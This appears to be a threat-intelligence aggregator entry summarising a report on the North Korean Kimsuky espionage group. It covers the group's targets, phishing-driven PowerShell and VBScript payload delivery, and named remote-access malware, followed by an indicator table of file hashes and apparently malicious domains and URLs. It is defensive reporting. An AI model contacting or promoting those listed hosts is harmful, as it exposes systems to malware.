Exposing the Steps of the Kimsuky APT Group

2024-12-27 Picus Security

https://www.picussecurity.com/resource/blog/exposing-the-steps-of-the-kimsuky-apt-group

Thumbnail for Exposing the Steps of the Kimsuky APT Group

Picus profiles Kimsuky as a North Korean espionage actor active since at least 2012 and tracked under aliases including Black Banshee, Velvet Chollima, THALLIUM and Emerald Sleet. The source describes targeting of South Korean government, think-tank, defense and policy interests, with later activity extending to the United States, Japan, Russia and Europe. It highlights the DEEP#GOSU campaign, where phishing attachments executed PowerShell and VBScript to pull payloads from services such as Dropbox and deploy remote access malware including TruRat. The article also summarizes Kimsuky use of spear phishing, RandomQuery, xRAT and Gold Dragon for keylogging, remote shell access, persistence and data exfiltration.

Indicators of Compromise

Type Value First Seen Last Seen
DOMAIN bk.ru 2024-12-04 2026-04-17
HASH 081804b491c70bfa63ecdbe9fd4618d… 2024-09-09 2026-04-03
HASH 689cfaa9319f3f7529a31472ecf6b2e… 2024-09-09 2025-12-31
HASH 2360a69e5fd7217e977123c81d3dbb6… 2023-11-01 2025-12-31
HASH 973f7939ea03fd2c9663dafc21bb968… 2024-02-29 2025-09-01
HASH 5e40d106977017b1ed235419b1e59ff… 2021-02-18 2025-09-01
HASH 63fb47c3b4693409ebadf8a5179141a… 2024-02-21 2025-02-16
HASH d8565d58ad8e4f5558b5cd70df0ad12… 2024-09-09 2024-12-27
HASH 3c8dbfcbb4fccbaf924f9a650a04cb4… 2024-09-09 2024-12-27
HASH cbf4cfa2d3c3fb04fe349161e051a8c… 2024-09-09 2024-12-27
HASH 0b5db31e47b0dccfdec46e74c0e70c6… 2024-09-09 2024-12-27
HASH 3ea2ead8f3cec030906dcbffe3efd5c… 2024-09-09 2024-12-27
HASH c83c7b000a955f2b8cb92bb112ed606… 2024-09-09 2024-12-27
HASH a03d13c9825e150810e6e6aaf053d71… 2024-09-09 2024-12-27
HASH 99dbc6fe3c3e465052fcefa16428617… 2024-09-09 2024-12-27
HASH 7667d1b8fcc4f712084e3e3f8b4ab50… 2024-09-09 2024-12-27
HASH 15d53bb839e00405a34a8b690ec181f… 2024-09-09 2024-12-27
HASH 5c907b722c53a5be256dc5f96b755bc… 2024-09-09 2024-12-27
HASH c6a48365c3db9761bd60981bdcdd87a… 2024-09-09 2024-12-27
HASH bfd74b4a1b413fa785a49ca4a9c0594… 2024-09-09 2024-12-27
HASH f1713afaf5958bdf3e975ebbab8245a… 2024-09-09 2024-12-27
HASH 2546d239a262c24a6f8ea01d890cbc4… 2024-09-09 2024-12-27
HASH bce1eb513aaac344b5b8f7a9ba9c9e3… 2024-09-09 2024-12-27
HASH f3b0da965a4050ab00fce727bb31e0f… 2024-09-09 2024-12-27
HASH 479038eb12ed07893ee0dcc04fbdcf1… 2024-09-09 2024-12-27
HASH 927b3564c1cf884d2a05e1d7bd24362… 2024-09-09 2024-12-27
HASH 89cad9a57985cc0ab3b7403a943ad0a… 2024-03-18 2024-12-27
HASH 60666cacdd6806ed05771f32eaa719e… 2024-03-18 2024-12-27
HASH b72caab78d164637fea0937d7a94fc4… 2024-03-18 2024-12-27
HASH f262588c48d2902992ffd275d2be636… 2024-03-18 2024-12-27
HASH 69c917ea96db28dbd5b67073ca0aac2… 2024-03-18 2024-12-27
HASH 1b75f70c226c9ada8e79c3fdd987277… 2024-03-18 2024-12-27
HASH 1617587ccdf5b0344089559ecf8fe7d… 2024-03-18 2024-12-27
HASH 46a5d54c264152ce915792af31c7582… 2024-03-18 2024-12-27
HASH c7f4aa77be7f7afe9d0665d3e705dbf… 2023-12-15 2024-12-27
HASH c9a7b42c7b29ca948160f95f017e9e9… 2023-12-15 2024-12-27
URL https://niscarea.com 2023-11-28 2024-12-27
DOMAIN niscarea.com 2023-11-28 2024-12-27
HASH 8bfa4fe0534c0062393b6a2597c3491… 2023-11-13 2024-12-27
URL http://00701111.000webhostapp.c… 2023-09-23 2024-12-27
DOMAIN 00701111.000webhostapp.com 2023-09-23 2024-12-27
HASH db6a9934570fa98a93a979e7e0e218e… 2023-08-24 2024-12-27
HASH 6c121f2b2efa6592c2c22b29218157e… 2023-06-29 2024-12-27
HASH 492a643bd1efdaca4ca125ade1b606e… 2023-04-20 2024-12-27
HASH a64fa9f1c76457ecc58402142a8728c… 2023-03-30 2024-12-27
HASH 5009c7d1590c1f8c05827122172583d… 2023-03-30 2024-12-27
HASH fee4f9dabc094df24d83ec1a8c4e4ff… 2023-03-30 2024-12-27
HASH 87c5d0c93b80acf61d24e7aaf0faae2… 2023-03-30 2024-12-27
HASH e6bbc33815b9f20b0cf832d7401dd89… 2023-03-29 2024-12-27
HASH 91eaf215be336eae983d069de16630c… 2021-02-18 2024-12-27

Related Actors

Related Reports

2024-09-12 • 50% Match
#Kimsuky #T1102.002 #T1082 #T1059.003 #T1567.002 #T1140 #T1005 #T1070.004 #T1587.001 #T1041 #T1608.001 #T1071.001 #T1112 #T1083 #T1056.001 #T1059.006 #T1204.001 #T1059.007 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1057 #T1059.005 #T1583.006 #T1518.001 #T1566.001 #T1547.001 #T1585.002 #T1053.005 #T1598.003 #T1583.001 #T1059.001 #T1036.005 #T1552.001 #T1585.001 #T1105 #T1219 #T1055 #T1553.002 #T1562.001 #T1027.002 #T1133 #T1190 #T1098 #T1016 #T1074.001 #T1588.002 #T1055.012 #T1587 #T1078.003 #T1071.002 #T1562.004 #T1550.002 #T1111 #T1071.003 #T1591 #T1003.001 #T1218.011 #T1593.002 #T1586.002 #T1588.005 #T1583.004 #T1036.004 #T1589.003 #T1594 #T1218.010 #T1557 #T1593.001 #T1218.005 #T1589.002 #T1584.001 #T1070.006 #T1021.001 #T1560.001 #T1176 #T1136.001 #T1543.003 #T1012 #T1534 #T1560.003 #T1007 #T1564.003 #T1114.003 #T1114.002 #T1564.002 #T1040 #T1546.001 #T1505.003
Shares tags: Kimsuky, T1082, T1071.001
2024-07-19 • 43% Match
#Trend #Andariel #Kimsuky #MoonstoneSleet #Lazarus #T1082 #T1059.003 #T1090 #T1140 #T1005 #T1070.004 #T1041 #T1113 #T1555 #T1560 #T1071.001 #T1046 #T1112 #T1115 #T1083 #T1497 #T1056.001 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1071 #T1124 #T1222 #T1552 #T1057 #T1583.003 #T1518.001 #T1547.001 #T1053.005 #T1539 #T1608.005 #T1583.001 #T1059.001 #T1053 #T1552.001 #T1566 #T1059 #T1003 #T1497.001 #T1102.001 #T1574.002 #T1562.001 #T1490 #T1486 #T1129 #T1133 #T1571 #T1548 #T1190 #T1203 #T1564.001 #T1087 #T1562.004 #T1218.011 #T1070.006 #T1547 #T1068 #T1614 #T1573 #T1095 #T1562 #T1070 #T1047 #T1056 #T1176 #T1010 #T1033 #T1569.002 #T1543.003 #T1485 #T1012 #T1202 #T1087.002 #T1021.004 #T1222.001 #T1518 #T1564.003 #T1505.003 #T1069.002 #T1564 #T1595.002 #T1027.005 #T1070.001 #T1056.004 #T1584
Shares tags: Kimsuky, T1082, T1560
« Back